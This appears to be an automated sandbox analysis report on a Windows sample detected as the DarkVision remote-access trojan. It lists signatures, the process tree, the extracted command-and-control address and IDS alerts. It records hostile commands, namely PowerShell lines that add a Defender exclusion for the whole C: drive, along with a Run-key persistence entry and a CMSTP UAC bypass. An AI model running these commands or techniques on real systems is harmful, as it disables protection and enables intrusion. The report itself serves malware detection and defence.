
Windows Analysis Report
SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe

Overview

General Information

Sample name: SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe
Analysis ID: 1656296
MD5: 18b6c58f5f099a577c2f322eba74d1e9
SHA1: 11cf8353e6adcf12061b4afb95c63308bda399b2
SHA256: 2c5b54f2576e1524d5dc1c5405d2b8cfe72fc16ca2a1c7c319e0961833d9d069
Tags: exe, user-SecuriteInfoCom

Detection

DarkVision Rat
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Benign windows process drops PE files
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DarkVision Rat
Yara detected UAC Bypass using CMSTP
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Creates HTML files with .exe extension (expired dropper behavior)
Creates autostart registry keys with suspicious names
Deletes itself after installation
Found direct / indirect Syscall (likely to bypass EDR)
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Searches for specific processes (likely to inject)
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Windows Binaries Write Suspicious Extensions
Switches to a custom stack to bypass stack traces
Tries to evade analysis by execution special instruction (VM detection)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to load drivers
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates or modifies windows services
Deletes files inside the Windows folder
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables driver privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Execution From GUID Like Folder Names
Sigma detected: Uncommon Svchost Parent Process
Spawns drivers
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe (PID: 7688 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe" MD5: 18B6C58F5F099A577C2F322EBA74D1E9)
    • cmd.exe (PID: 7744 cmdline: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:' MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7800 cmdline: powershell.exe Add-MpPreference -ExclusionPath 'C:' MD5: 04029E121A0CFA5991749937DD22A1D9)
    • svchost.exe (PID: 7780 cmdline: "C:\Windows\system32\svchost.exe" MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • tzutil.exe (PID: 8188 cmdline: "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" "" MD5: BAD4357401102697881E78923E2607B6)
        • powershell.exe (PID: 7524 cmdline: powershell Add-MpPreference -ExclusionPath C:\ MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 7476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 2856 cmdline: powershell Remove-MpPreference -ExclusionPath C:\ MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 4324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7356 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\set.bat" """ MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • w32tm.exe (PID: 7332 cmdline: "C:\Users\user\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" "" MD5: 15BDC4BD67925EF33B926843B3B8154B)
  • cleanup
Malware configuration (extracted): {"C2": "82.29.67.160", "Port": 443}
Source | Rule | Description | Author | Strings
00000004.00000002.2571622191.000001C3DDDD8000.00000002.00001000.00020000.00000000.sdmp | JoeSecurity_DarkVisionRat | Yara detected DarkVision Rat | Joe Security
00000004.00000002.2571622191.000001C3DDDD8000.00000002.00001000.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
00000000.00000002.1322401814.0000000000434000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_DarkVisionRat | Yara detected DarkVision Rat | Joe Security
00000000.00000002.1322401814.0000000000434000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
00000000.00000002.1323038047.0000000000785000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_DarkVisionRat | Yara detected DarkVision Rat | Joe Security

Source | Rule | Description | Author | Strings
0.2.SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe.78bfd0.1.raw.unpack | JoeSecurity_DarkVisionRat | Yara detected DarkVision Rat | Joe Security
0.2.SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe.78bfd0.1.raw.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
0.2.SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe.78bfd0.1.raw.unpack | INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM | Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | ditekSHen
  • 0x36ee8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
  • 0x36e18:$s1: CoGetObject
  • 0x36eb0:$s2: Elevation:Administrator!new:
4.2.svchost.exe.1c3ddda0000.0.unpack | JoeSecurity_DarkVisionRat | Yara detected DarkVision Rat | Joe Security
4.2.svchost.exe.1c3ddda0000.0.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security

                    System Summary

Source: File created; Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Windows\System32\svchost.exe, ProcessId: 7780, TargetFilename: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:', CommandLine: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:', CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe, ParentProcessId: 7688, ParentProcessName: SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe, ProcessCommandLine: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:', ProcessId: 7744, ProcessName: cmd.exe
Source: File created; Author: Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Windows\System32\svchost.exe, ProcessId: 7780, TargetFilename: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\set.bat
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\svchost.exe, ProcessId: 7780, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD}
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:', CommandLine: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:', CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe, ParentProcessId: 7688, ParentProcessName: SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe, ProcessCommandLine: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:', ProcessId: 7744, ProcessName: cmd.exe
Source: Process started; Author: Nasreddine Bencherchali (Nextron Systems); Data: Command: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\set.bat" """, CommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\set.bat" """, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\system32\svchost.exe", ParentImage: C:\Windows\System32\svchost.exe, ParentProcessId: 7780, ParentProcessName: svchost.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\set.bat" """, ProcessId: 7356, ProcessName: cmd.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\system32\svchost.exe", CommandLine: "C:\Windows\system32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe, ParentProcessId: 7688, ParentProcessName: SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe, ProcessCommandLine: "C:\Windows\system32\svchost.exe", ProcessId: 7780, ProcessName: svchost.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: powershell.exe Add-MpPreference -ExclusionPath 'C:', CommandLine: powershell.exe Add-MpPreference -ExclusionPath 'C:', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:', ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7744, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe Add-MpPreference -ExclusionPath 'C:', ProcessId: 7800, ProcessName: powershell.exe
Source: Process started; Author: vburov; Data: Command: "C:\Windows\system32\svchost.exe", CommandLine: "C:\Windows\system32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe, ParentProcessId: 7688, ParentProcessName: SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe, ProcessCommandLine: "C:\Windows\system32\svchost.exe", ProcessId: 7780, ProcessName: svchost.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-04-04T08:44:20.773192+0200 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49689 | 104.26.8.202 | 443 | TCP
2025-04-04T08:44:23.452645+0200 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49691 | 104.26.8.202 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-04-04T08:44:18.515459+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49688 | 82.29.67.160 | 443 | TCP
2025-04-04T08:44:22.555238+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49690 | 82.29.67.160 | 443 | TCP
2025-04-04T08:44:26.561097+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49692 | 82.29.67.160 | 443 | TCP
2025-04-04T08:44:30.576741+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49693 | 82.29.67.160 | 443 | TCP
2025-04-04T08:44:34.746710+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49726 | 82.29.67.160 | 443 | TCP
2025-04-04T08:44:38.749169+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49747 | 82.29.67.160 | 443 | TCP
2025-04-04T08:44:42.780112+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49778 | 82.29.67.160 | 443 | TCP
2025-04-04T08:44:46.810979+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49779 | 82.29.67.160 | 443 | TCP
2025-04-04T08:44:50.847331+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49780 | 82.29.67.160 | 443 | TCP
2025-04-04T08:44:54.858214+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49781 | 82.29.67.160 | 443 | TCP
2025-04-04T08:44:58.873995+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49782 | 82.29.67.160 | 443 | TCP
2025-04-04T08:45:02.907126+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49783 | 82.29.67.160 | 443 | TCP
2025-04-04T08:45:06.608116+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49784 | 82.29.67.160 | 443 | TCP
2025-04-04T08:45:10.045494+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49785 | 82.29.67.160 | 443 | TCP
2025-04-04T08:45:13.248624+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49787 | 82.29.67.160 | 443 | TCP
2025-04-04T08:45:16.217686+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49788 | 82.29.67.160 | 443 | TCP
2025-04-04T08:45:18.998963+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49789 | 82.29.67.160 | 443 | TCP
2025-04-04T08:45:21.608216+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49790 | 82.29.67.160 | 443 | TCP
2025-04-04T08:45:24.061584+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49791 | 82.29.67.160 | 443 | TCP
2025-04-04T08:45:26.386226+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49792 | 82.29.67.160 | 443 | TCP
2025-04-04T08:45:28.545686+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49793 | 82.29.67.160 | 443 | TCP
2025-04-04T08:45:30.592605+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49794 | 82.29.67.160 | 443 | TCP
2025-04-04T08:45:32.545572+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49795 | 82.29.67.160 | 443 | TCP
2025-04-04T08:45:34.405919+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49796 | 82.29.67.160 | 443 | TCP
2025-04-04T08:45:36.186587+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49797 | 82.29.67.160 | 443 | TCP
2025-04-04T08:45:37.889324+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49798 | 82.29.67.160 | 443 | TCP
2025-04-04T08:45:39.514670+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49799 | 82.29.67.160 | 443 | TCP
2025-04-04T08:45:41.092535+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49800 | 82.29.67.160 | 443 | TCP
2025-04-04T08:45:42.608146+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49801 | 82.29.67.160 | 443 | TCP
2025-04-04T08:45:44.061111+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49802 | 82.29.67.160 | 443 | TCP
2025-04-04T08:45:45.467493+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49803 | 82.29.67.160 | 443 | TCP
2025-04-04T08:45:46.858101+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49804 | 82.29.67.160 | 443 | TCP
2025-04-04T08:45:48.202767+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49805 | 82.29.67.160 | 443 | TCP
2025-04-04T08:45:49.498856+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49806 | 82.29.67.160 | 443 | TCP
2025-04-04T08:45:50.780809+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49807 | 82.29.67.160 | 443 | TCP
2025-04-04T08:45:52.045869+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49808 | 82.29.67.160 | 443 | TCP
2025-04-04T08:45:53.280759+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49809 | 82.29.67.160 | 443 | TCP
2025-04-04T08:45:54.499881+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49810 | 82.29.67.160 | 443 | TCP
2025-04-04T08:45:55.686130+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49811 | 82.29.67.160 | 443 | TCP
2025-04-04T08:45:56.858358+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49812 | 82.29.67.160 | 443 | TCP
2025-04-04T08:45:58.014628+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49813 | 82.29.67.160 | 443 | TCP
2025-04-04T08:45:59.170831+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49814 | 82.29.67.160 | 443 | TCP
2025-04-04T08:46:00.312122+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49815 | 82.29.67.160 | 443 | TCP
2025-04-04T08:46:01.423493+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49816 | 82.29.67.160 | 443 | TCP
2025-04-04T08:46:02.597591+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49817 | 82.29.67.160 | 443 | TCP
2025-04-04T08:46:03.687528+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49818 | 82.29.67.160 | 443 | TCP
2025-04-04T08:46:04.780153+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49819 | 82.29.67.160 | 443 | TCP
2025-04-04T08:46:05.858475+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49820 | 82.29.67.160 | 443 | TCP
2025-04-04T08:46:06.951633+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49821 | 82.29.67.160 | 443 | TCP
2025-04-04T08:46:08.031198+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49822 | 82.29.67.160 | 443 | TCP
2025-04-04T08:46:09.108467+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49823 | 82.29.67.160 | 443 | TCP
2025-04-04T08:46:10.156035+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49824 | 82.29.67.160 | 443 | TCP
2025-04-04T08:46:11.338928+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49825 | 82.29.67.160 | 443 | TCP
2025-04-04T08:46:12.389542+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49826 | 82.29.67.160 | 443 | TCP
2025-04-04T08:46:13.452800+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49827 | 82.29.67.160 | 443 | TCP
2025-04-04T08:46:14.498641+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49828 | 82.29.67.160 | 443 | TCP
2025-04-04T08:46:15.545636+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49829 | 82.29.67.160 | 443 | TCP
2025-04-04T08:46:16.592755+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49830 | 82.29.67.160 | 443 | TCP
2025-04-04T08:46:17.632228+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49831 | 82.29.67.160 | 443 | TCP
2025-04-04T08:46:18.671054+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49832 | 82.29.67.160 | 443 | TCP
2025-04-04T08:46:19.701973+0200 | 2045618 | 1 | A Network Trojan was detected | 192.168.2.6 | 49833 | 82.29.67.160 | 443 | TCP


                    AV Detection

Source: SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe; Avira: detected
Source: 4.2.svchost.exe.1c3ddda0000.0.unpack; Malware Configuration Extractor: DarkVision Rat {"C2": "82.29.67.160", "Port": 443}
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe; ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe; ReversingLabs: Detection: 45%
Source: C:\Windows\Temp\bS4Vs_8188.sys; ReversingLabs: Detection: 33%
Source: SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe; Virustotal: Detection: 64%
Source: SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe; ReversingLabs: Detection: 80%
Source: Submitted Sample; Neural Call Log Analysis: 99.9%
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe; Code function: 0_2_004051CA CryptBinaryToStringW,CryptBinaryToStringW,__snwprintf,LocalFree,WaitForSingleObject,RtlExitUserThread,__snwprintf,WaitForMultipleObjects,WaitForSingleObject,GetExitCodeProcess,WaitForSingleObject,WaitForSingleObject,CloseHandle,CloseHandle,LocalFree,LocalFree,CloseHandle,CloseHandle,0_2_004051CA
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe; Code function: 0_2_0041CFE0 CryptAcquireContextW,CryptCreateHash,WaitForSingleObject,CryptHashData,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CryptReleaseContext,CryptDestroyHash,0_2_0041CFE0
Source: C:\Windows\System32\svchost.exe; Code function: 4_2_000001C3DDDBDD8F CryptReleaseContext,CryptDestroyHash,4_2_000001C3DDDBDD8F
Source: C:\Windows\System32\svchost.exe; Code function: 4_2_000001C3DDDBDD5A CryptReleaseContext,CryptDestroyHash,4_2_000001C3DDDBDD5A
Source: C:\Windows\System32\svchost.exe; Code function: 4_2_000001C3DDDBDCF7 CryptReleaseContext,CryptDestroyHash,4_2_000001C3DDDBDCF7
Source: C:\Windows\System32\svchost.exe; Code function: 4_2_000001C3DDDBDD1E CryptReleaseContext,CryptDestroyHash,4_2_000001C3DDDBDD1E
Source: C:\Windows\System32\svchost.exe; Code function: 4_2_000001C3DDDBDC00 CryptAcquireContextW,CryptCreateHash,WaitForSingleObject,CryptHashData,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CryptReleaseContext,CryptDestroyHash,4_2_000001C3DDDBDC00
Source: C:\Windows\System32\svchost.exe; Code function: 4_2_000001C3DDDA53B0 LocalAlloc,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,lstrcpyW,CryptBinaryToStringW,CryptBinaryToStringW,lstrcpyW,LocalFree,WaitForSingleObject,RtlExitUserThread,WaitForMultipleObjects,WaitForSingleObject,GetExitCodeProcess,WaitForSingleObject,WaitForSingleObject,CloseHandle,CloseHandle,LocalFree,LocalFree,CloseHandle,CloseHandle,4_2_000001C3DDDA53B0
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe; Code function: 8_2_008F82FC malloc,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,free,8_2_008F82FC
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe; Code function: 8_2_0093F028 CryptGenRandom,RegSetValueExA,GetWindowsDirectoryW,8_2_0093F028
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe; Code function: 8_2_008E71EA CryptAcquireContextA,CryptCreateHash,8_2_008E71EA
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe; Code function: 8_2_008E71E8 CryptAcquireContextA,CryptCreateHash,8_2_008E71E8
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe; Code function: 8_2_008E7244 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,8_2_008E7244
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe; Code function: 8_2_008EE4C4 CryptAcquireContextA,CryptCreateHash,8_2_008EE4C4
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe; Code function: 8_2_008F8478 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,8_2_008F8478
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe; Code function: 8_2_008EE510 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,8_2_008EE510
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe; Code function: -----BEGIN PUBLIC KEY----- 8_2_008FF214
Source: C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe; Code function: -----BEGIN PUBLIC KEY----- 8_2_008D3268
Source: tzutil.exe; Binary or memory string: -----BEGIN PUBLIC KEY-----

                    Exploits

Source: Yara match; File source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe.78bfd0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 4.2.svchost.exe.1c3ddda0000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe.78bfd0.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000004.00000002.2571622191.000001C3DDDD8000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.1322401814.0000000000434000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.1323038047.0000000000785000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe PID: 7688, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: svchost.exe PID: 7780, type: MEMORYSTR
Source: SecuriteInfo.com.Win32.MalwareX-gen.15639.2654.exe; Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown; HTTPS traffic detected: 104.26.8.202:443 -> 192.168.2.6:49689 version: TLS 1.2
